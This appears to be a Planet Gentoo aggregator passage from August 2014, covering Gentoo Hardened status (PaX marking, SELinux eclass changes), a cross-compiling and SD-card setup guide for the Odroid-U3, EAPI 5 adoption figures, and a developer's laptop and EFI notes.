blueness (Anthony G. Basile) has been working on the uclibc stages for some time. Due to the configurable nature of these setups, many /etc/portage files were provided as part of the stages, which shouldn’t happen. Work is on the way to update this accordingly.

For the musl setup, blueness is also rebuilding the stages to use a symbolic link to the dynamic linker (/lib/ld-linux-arch.so) as recommended by the musl maintainers.

Kernel and grsecurity with PaX

A bug has been submitted which shows that large binary files (in the bug, a chrome binary with debug information is shown to be more than 2 Gb in size) cannot be pax-mark’ed, with paxctl informing the user that the file is too big. The problem is when the PAX marks are in ELF (as the application mmaps the binary) – users of extended attributes based PaX markings do not have this problem. blueness is working on making things a bit more intelligent, and to fix this.

SELinux

I have been making a few changes to the SELinux setup:

  • The live ebuilds (those with version 9999 which use the repository policy rather than snapshots of the policies) are now being used as “master” in case of releases: the ebuilds can just be copied to the right version to support the releases. The release script inside the repository is adjusted to reflect this as well.
  • The SELinux eclass now supports two variables, SELINUX_GIT_REPO and SELINUX_GIT_BRANCH, which allows users to use their own repository, and developers to work in specific branches together. By setting the right value in the users’ make.conf switching policy repositories or branches is now a breeze.
  • Another change in the SELinux eclass is that, after the installation of SELinux policies, we will check the reverse dependencies of the policy package and relabel the files of these packages. This allows us to only have RDEPEND dependencies towards the SELinux policy packages (if the application itself does not otherwise link with libselinux), making the dependency tree within the package manager more correct. We still need to update these packages to drop the DEPEND dependency, which is something we will focus on in the next few months.
  • In order to support improved cooperation between SELinux developers in the Gentoo Hardened team – perfinion (Jason Zaman) is in the queue for becoming a new developer in our mids – a coding style for SELinux policies is being drafted up. This is of course based on the coding style of the reference policy, but with some Gentoo specific improvements and more clarifications.
  • perfinion has been working on improving the SELinux support in OpenRC (release 0.13 and higher), making some of the additions that we had to make in the past – such as the selinux_gentoo init script – obsolete.

The meeting also discussed a few bugs in more detail, but if you really want to know, just hang on and wait for the IRC logs ;-) Other usual sections (system integrity and profiles) did not have any notable topics to describe.

August 25, 2014
Matthew Thode a.k.a. prometheanfire (homepage, bugs)
Gentoo on the Odroid-U3 (August 25, 2014, 05:00 UTC)

Arm cross compiler setup and stuffs

This will set up a way to compile things for arm on your native system (amd64 for me)

emerge dev-embedded/u-boot-tools sys-devel/crossdev
crossdev -S -s4 -t armv7a-hardfloat-linux-gnueabi

Building the kernel

This assumes you have kernel sources, I'm testing 3.17-rc2 since they just got support for the odroid-u3 into upstream.

Also, I tend to build without modules, so keep that in mind.

# get the base config (For me on an odroid-u3
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make exynos_defconfig
# change it to add what I want/need
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make menuconfig
# build the kernel
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j10

Setting up the SD Card

I tend to be generous, 10M for the bootloader

parted /dev/sdb mklabel msdos y
parted /dev/sdb mkpart p fat32 10M 200M
parted /dev/sdb mkpart p 200M 100%
parted /dev/sdb toggle 1 boot

mkfs.vfat /dev/sdb1
mkfs.ext4 /dev/sdb2

Building uboot

This may differ between boards, but should general look like the following (I hear vanilla uboot works now)

I used the odroid-v2010.12 branch and one thing to note is that if it sees a zImage on the boot partition it will ONLY use that, kinda of annoying.

git clone git://github.com/hardkernel/u-boot.git
cd u-boot
sed -i -e "s/soft-float/float-abi=hard -mfpu=vfpv3/g" arch/arm/cpu/armv7/config.mk
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make smdk4412_config
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j1
sudo "sh /home/USER/dev/arm/u-boot/sd_fuse/sd_fusing.sh /dev/sdb"

Copying the kernel/userland

sudo -i
mount /dev/sdb2 /mnt/gentoo
mount /dev/sdb1 /mnt/gentoo/boot
cp /home/USER/dev/linux/arch/arm/boot/dts/exynos4412-odroidu3.dtb /mnt/gentoo/boot/
cp /home/USER/dev/linux/arch/arm/boot/zImage /mnt/gentoo/boot/kernel-3.17-rc2.raw
cd /mnt/gentoo/boot
cat kernel-3.17-rc2.raw exynos4412-odroidu3.dtb > kernel-3.17-rc2

tar -xf /tmp/stage3-armv7a_hardfp-hardened-20140627.tar.bz2 -C /mnt/gentoo/

Setting up userland

I tend to just copy or generate a shadow file and overwrite the root entry in /etc/shadow...

Then set up on when booted

Setting up the bootloader

put this in /mnt/gentoo/boot/boot.txt

setenv initrd_high "0xffffffff"
setenv fdt_high "0xffffffff"
setenv fb_x_res "1920"
setenv fb_y_res "1080"
setenv hdmi_phy_res "1080"
setenv bootcmd "fatload mmc 0:1 0x40008000 kernel-3.17-rc2; bootm 0x40008000"
setenv bootargs "console=tty1 console=ttySAC1,115200n8 fb_x_res=${fb_x_res} fb_y_res=${fb_y_res} hdmi_phy_res=${hdmi_phy_res} root=/dev/mmcblk0p2 rootwait ro mem=2047M"
boot

and run this

mkimage -A arm -T script -C none -n "Boot.scr for odroid-u3" -d boot.txt boot.scr

That should do it :D

I used steev (a fellow gentoo dev) and http://www.funtoo.org/ODROID_U2 as sources.

August 22, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

As of today, more than 50% of the 37527 ebuilds in the Gentoo portage tree use the newest ebuild API (EAPI) version, EAPI=5!
The details of the various EAPIs can be found in the package manager specification (PMS); the most notable new feature of EAPI 5, which has sped up acceptance a lot is the introduction of so-called subslots. A package A can specify a subslot, another package B that depends on it can specify that it needs to be rebuilt when the subslot of A changes. This leads to much more elegant solutions for many of the the link or installation path problems that revdep-rebuild, emerge @preserved-rebuild, or e.g. perl-cleaner try to solve... Another useful new feature in EAPI=5 is the masking of use-flags specifically for stable-marked ebuilds.
You can follow the adoption of EAPIs in the portage tree on an automatically updated graph page.

August 19, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Switching to new laptop (August 19, 2014, 20:11 UTC)

I’m slowly but surely starting to switch to a new laptop. The old one hasn’t completely died (yet) but given that I had to force its CPU frequency at the lowest Hz or the CPU would burn (and the system suddenly shut down due to heat issues), and that the connection between the battery and laptop fails (so even new battery didn’t help out) so I couldn’t use it as a laptop… well, let’s say the new laptop is welcome ;-)

Building Gentoo isn’t an issue (having only a few hours per day to work on it is) and while I’m at it, I’m also experimenting with EFI (currently still without secure boot, but with EFI) and such. Considering that the Gentoo Handbook needs quite a few updates (and I’m thinking to do more than just small updates) knowing how EFI works is a Good Thing ™.

For those interested – the EFI stub kernel instructions in the article on the wiki, and also in Greg’s wonderful post on booting a self-signed Linux kernel (which I will do later) work pretty well. I didn’t try out the “Adding more kernels” section in it, as I need to be able to (sometimes) edit the boot options (which isn’t easy to accomplish with EFI stub-supporting kernels afaics). So I installed Gummiboot (and created a wiki article on it).

Lots of things still planned, so little time. But at least building chromium is now a bit faster – instead of 5 hours and 16 minutes, I can now enjoy the newer versions after little less than 40 minutes.